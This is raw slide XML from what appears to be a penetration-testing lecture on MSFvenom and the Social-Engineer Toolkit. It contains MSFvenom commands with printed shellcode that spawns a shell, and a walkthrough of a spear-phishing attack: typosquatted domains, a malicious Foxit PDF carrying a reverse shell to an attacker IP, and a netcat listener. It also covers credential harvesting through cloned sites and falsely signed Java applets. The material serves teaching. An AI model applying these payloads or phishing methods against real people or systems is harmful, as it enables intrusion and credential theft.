            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom -p linux/x86/exec CMD='/bin/sh' -a x86 -b '\x00' -i 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-298450" marL="91440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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>Output:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"\x68</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="980000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="980000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x00\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="980000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x2f\x62\x69\x6e\x2f\x73\x68</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="980000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x57\x53\x89\xe1\xcd" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"\x80"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="91440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rtl="0" lvl="0" indent="0" mar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0" name="Shape 450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MSFvenom example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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4" name="Shape 45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55" name="Shape 455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Example use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom -p linux/x86/exec CMD='/bin/sh' -a x86 -b '\x00' -</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-298450" marL="91440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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>Output:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[*] x86/shikata_ga_nai succeeded with size 70 (iteration=1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[*] x86/shikata_ga_nai succeeded with size 97 (iteration=2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[*] x86/shikata_ga_nai succeeded with size 124 (iteration=3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"\xda\xd1\xd9\x74\x24\xf4\x5d\x31\xc9\xbb\x81\x4c\x7b\x16" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"\xb1\x19\x31\x5d\x18\x83\xc5\x04\x03\x5d\x95\xae\x8e\xad" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"\x20\x6e\x82\x1b\x97\xaf\xbd\xe8\x03\xc4\x63\x20\x82\x95" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"\x8e\xc1\xd1\xd2\x9f\x98\xc9\xd9\x82\x32\xbe\x68\x15\x3d" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"\x0e\xd1\x8c\x24\x46\xfa\xe9\x89\x21\x6b\x05\x2e\xfb\xf6" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"\xf5\xda\xc7\x52\xb1\x1d\xf0\x2e\x94\xfc\xb8\x1d\x06\x18" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"\x0c\xb5\xe7\xd2\x3b\x4b\x4c\x12\xd3\x6d\xed\xd3\x6a\x58" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"\xf1\x39\x87\x77\xad\x1d\x46\xca\x55\x90\xdf\xae\xa5\x7d" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"\x23\xf9\x6c\x3b\xba\x61\xf5\xd9\x63\xa2\xd3\x69"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="91440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rtl="0" lvl="0" indent="0" marL="91440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rtl="0" lvl="0" indent="0" marL="91440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rtl="0" lvl="0" indent="0" mar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6" name="Shape 456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MSFvenom example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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0" name="Shape 46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61" name="Shape 461"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1658990" x="457200"/>
            <a:ext cy="4840199" cx="23132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sz="1200" lang="en"/>
              <a:t>Here the payload is 32-bit windows shellcode to spawn a shell bound to a tcp port.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1200"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" lang="en"/>
              <a:t>No CMD is necessary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1200"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" lang="en"/>
              <a:t>-e specifies the shikata_ga_nai encoder, which is quite popular. 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1200"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1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Shape 462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MSFvenom example 2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463" name="Shape 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228725" x="2867025"/>
            <a:ext cy="5629275" cx="627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7" name="Shape 46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pic>
        <p:nvPicPr>
          <p:cNvPr id="468" name="Shape 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0" x="0"/>
            <a:ext cy="5725385" cx="9161645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="Shape 469"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3786737" x="685800"/>
            <a:ext cy="1046400" cx="77724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sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Shape 470"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5085798" x="685800"/>
            <a:ext cy="1546500" cx="77724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Social Engineer Toolkit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(SET)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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4" name="Shape 47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75" name="Shape 475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The Social-Engineer Toolkit (SET)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Shape 476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Developed by the team at Social-Engineer.org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Chris Hadnagy (totally awesome person)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Is the industry standard for any social engineering penetration testing attacks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i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Augments an attacker's ability to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>schmooze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with a feature-rich technical arsenal.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Features ways to attack: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human weakness, curiosity, credibility, avarice, habit, &amp; stupidity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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0" name="Shape 48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81" name="Shape 481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SET terminology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Shape 482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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack-vector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: is an avenue for gaining information about or access to a system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rPr lang="en"/>
              <a:t>SET categorizes attacks by attack vector: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web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email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USB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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...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" name="Shape 6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.... like the movies...</a:t>
            </a:r>
          </a:p>
        </p:txBody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OK not so much...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rPr lang="en"/>
              <a:t>Obligitory </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.youtube.com/watch?v=u8qgehH3kEQ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Shape 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4223301" x="457200"/>
            <a:ext cy="2344597" cx="4240033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Shape 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3321831" x="4173060"/>
            <a:ext cy="3246067" cx="4513739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Shape 6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y="324525" x="5419445"/>
            <a:ext cy="2405418" cx="326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6" name="Shape 48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87" name="Shape 487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SET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Shape 488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SET's features let you use in attacks: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emails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spoofed/cloned websites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MITM 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custom malware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custom exploits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custom media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custom QR codes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custom applets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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and soooooo much more</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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2" name="Shape 49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93" name="Shape 493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SET configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Shape 494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Some assembly required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Need to turn on what vectors you need in the config file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WEBATTACK_EMAIL=ON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SELF_SIGNED_APPLET=ON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...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Its totally worth it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8" name="Shape 49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99" name="Shape 499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SET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="Shape 500"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1600200" x="457200"/>
            <a:ext cy="4967700" cx="34580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sz="1800" lang="en"/>
              <a:t>located in /pentest/exploits/set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>on backtrack5 (may vary)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rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>To run: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./set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pic>
        <p:nvPicPr>
          <p:cNvPr id="501" name="Shape 5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274637" x="3962400"/>
            <a:ext cy="6048375" cx="472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5" name="Shape 50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06" name="Shape 506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SET Spear Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Shape 507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This attack vector is for specially crafting file-format exploits (i.e. adobe PDF exploits) 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To be sent as attachments in emails to the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" mar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Features email support for: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SMTP (anonymous and credentialed)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gmail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sendmail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...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Supports the delivery/crafting of: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standard email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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html-supported email</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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1" name="Shape 51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12" name="Shape 512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SET Spear Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="513" name="Shape 513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Real world example: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Say the target company is www.example.com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Attackers register www.examp1e.com, or www.eexample.com, www.exaample.com, www.eaxmple.com, www.exapmle.com, etc...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Then attackers send mass-email to the employees of www.example.com from their www.examp1e.com domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>attach malicious PDF, with a reverse-shell payload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SET can automate ALL of this, even the reverse-shell listener.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except for the domain regisration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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7" name="Shape 51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18" name="Shape 518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SET Spear Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Shape 519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Using set to craft malware for phishing attacks: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520" name="Shape 5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2272125" x="457200"/>
            <a:ext cy="3457575" cx="448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4" name="Shape 52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25" name="Shape 525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SET Spear Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="Shape 526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Crafting options/vectors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="527" name="Shape 5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2456975" x="457200"/>
            <a:ext cy="3057525" cx="607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1" name="Shape 53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32" name="Shape 532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SET Spear Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="Shape 533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Payload selection </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="534" name="Shape 5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2145712" x="457200"/>
            <a:ext cy="3876675" cx="527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8" name="Shape 53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39" name="Shape 539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SET Spear Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Shape 540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Payload selection part 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="541" name="Shape 5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2145712" x="457200"/>
            <a:ext cy="3876675" cx="612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5" name="Shape 54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46" name="Shape 546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SET Spear Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="Shape 547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So the malicious PDF has been created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exploits a vulnerability in foxit reader 4.1.1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spawns a shell that connects back to the attacker (192.168.56.102)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" mar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IF / When the victim opens it, it looks like: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" name="Shape 7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Real life is way cooler</a:t>
            </a:r>
          </a:p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pic>
        <p:nvPicPr>
          <p:cNvPr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3570700" x="3352800"/>
            <a:ext cy="2997200" cx="533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4336273" x="457200"/>
            <a:ext cy="2231626" cx="4017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Shape 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1321800" x="457200"/>
            <a:ext cy="3073991" cx="40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1" name="Shape 55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52" name="Shape 552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sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="Shape 553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pic>
        <p:nvPicPr>
          <p:cNvPr id="554" name="Shape 5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52400" x="838200"/>
            <a:ext cy="6734175" cx="741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8" name="Shape 55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59" name="Shape 559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Meanwhile the attacker's listener looks like:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Shape 560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rPr lang="en"/>
              <a:t>my SET listener crashed, so I went with netcat :P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/gg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="561" name="Shape 5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455150" x="457200"/>
            <a:ext cy="3886200" cx="610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5" name="Shape 56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66" name="Shape 566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SET web attack vectors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Shape 567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SET supports a number of web attack vectors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Java applets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Client-side web exploits(browser exploits)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User/Password harvesting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clone website, and harvest login info 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redirect traffic to legit site, victim sees nothing wrong if no HTTPS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Tabnapping, MITM, web jacking, etc etc...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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1" name="Shape 57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72" name="Shape 572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SET web attack vectors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="573" name="Shape 573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The Java applet option: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Because its java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Highly effective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>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java allows you to sign an applet with any name you choose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Sign it as Apple, Google, Samsung, Twitter...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The SET java applet attack vector provides an applet that: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auto-detects the user's browser type,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delivers a custom payload to the victim's machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Java does not consider this a vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>its a FEATURE!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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7" name="Shape 57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78" name="Shape 578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SET web attack vectors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="579" name="Shape 579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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="36666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Java applet option: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SET lets you clone other websites, or use a template to house the web attack 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SET will automatically host a web server + website to house the configured applet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goal is to get the attacker to navigate to the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Social engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DNS attacks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When the page loads, the user will be prompted for the java applet:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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3" name="Shape 58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84" name="Shape 584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On Windows XP - IE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5" name="Shape 585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586" name="Shape 5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971076" x="455074"/>
